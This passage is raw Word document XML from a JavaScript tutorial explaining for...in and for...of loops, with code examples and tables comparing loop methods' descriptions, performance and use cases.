    <w:p w14:paraId="2CC01937" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="685"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The for...in loop iterates over the </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>enumerable properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an object (including arrays) as string keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60941FC8" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="685"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>It's mainly intended for iterating over object properties, not arrays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D941C77"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2614CEC8" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="686"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Typically slower than a for loop for arrays because it iterates over the keys (property names) rather than the values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074DA86D"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494301F0" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Best used for iterating over the properties of objects rather than arrays.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AAE31B3" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="687"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Not recommended for arrays because it can iterate over inherited properties or non-numeric keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B56DE0"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3E3BAC3C"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obj = { a: 1, b: 2, c: 3 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124B57AF"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for (const key in obj) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6F9EE7"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console.log(`${key}: ${obj[key]}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282FE4F4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F20CF"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Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524A7991"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a: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E269DC0"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b: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7E7BB4"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c: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615CA7FE"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b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Important Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid using for...in with arrays, as it can lead to unexpected results (e.g., iterating over non-index properties).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F44B4F6"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7. for...of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DF2ED7"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Description:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5214B01E" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="688"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The for...of loop iterates over </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>iterable objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, such as arrays, strings, maps, sets, etc., accessing values directly rather than keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB549B5"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD9AAA7" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="689"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Performance is generally comparable to for and forEach. It’s slower than for but more optimized for iterables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387492EC"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Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3541CC" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="690"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ideal when you need to iterate over the values of an iterable object (e.g., elements of an array).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3CCC94"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array = [1, 2, 3, 4, 5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698120E8"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for (const value of array) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D847A4"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console.log(value * 2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19410C83"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89BE53" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE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Output: 2, 4, 6, 8, 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125773F6"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 Summary of All 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gridCol w:w="3324"/>
        <w:gridCol w:w="2273"/>
        <w:gridCol w:w="3969"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="19F1D59E" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="400856F2"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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AFC4CB2"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C1706C7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A6BF062"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="5B818E97" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D9CC52B"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for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3244FA5C"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Traditional loop with control over iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B455917"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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Fastest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E778DA3"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When maximum control or speed is needed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="234C7DE4" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="144811AC"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forEach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BDAACA8"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Iterates over each array element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F1E7335"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Slightly slower than for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E36B1B6"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When you need to iterate with side effects.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="58EDD0C0" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48866773"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map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="673B7586"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Transforms each element into a new array</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F189235"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Slower due to new array</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CADF71D"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When you want to create a new transformed array</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="1A9B609F" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="366E3EF3"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filter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E71CB04"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Creates a new array with filtered elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E863105"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Slower due to new array</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D135B1D"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When extracting a subset of elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="40ECF6DE" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55D67B9E"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reduce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20513DA8"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Accumulates values into a single result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67B72707"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Slowest (complex operation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78611EF1"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When combining all elements into one result.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="77A40E23" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5DC76B1A"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for...in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4664B716"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Iterates over object properties (keys)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20D09D63"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Slower for arrays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E32A2FF"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Ideal for objects, not recommended for arrays.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="6F9198E0" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BBF5E81"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for...of</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27997C91"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Iterates over iterable objects' values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="464C8A56"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Comparable to forEach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0163DFE9"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When iterating over values in an iterable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3FA2C229"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Key Differences Between for...in and for...of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3004"/>
        <w:gridCol w:w="3061"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="5B8A6238" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61FF7CC7"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2162CEFD"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for...in</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66AB7A94"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for...of</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="097592AE" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66E6F21B"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Iterates Over</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44E2E800"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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Keys/properties</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> of an object/array</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FEB1AF2"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b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Values</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> of an iterable object</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="194621A8" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E88CBBD"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Suitable For</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60FD0A25"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Objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="667B0A47"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Arrays, strings, maps, sets, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="218506EC" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3285F808"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Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5889281E"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Slower for arrays</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20D4DF3E"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Generally faster for arrays</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w14:paraId="2CF395DA" w14:textId="77777777" w:rsidTr="005F3DE4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07674475"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Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FBA033D"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Iterating over object properties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E1B009E" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA2F32">
              <w:rPr>
                <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Iterating over values of iterable items</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17C8879E"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Final Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03076D74" w14:textId="77777777" w:rsidR="005F3DE4" w:rsidRPr="00DA2F32" w:rsidRDefault="005F3DE4" w:rsidP="009E0607">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="691"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2F32">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
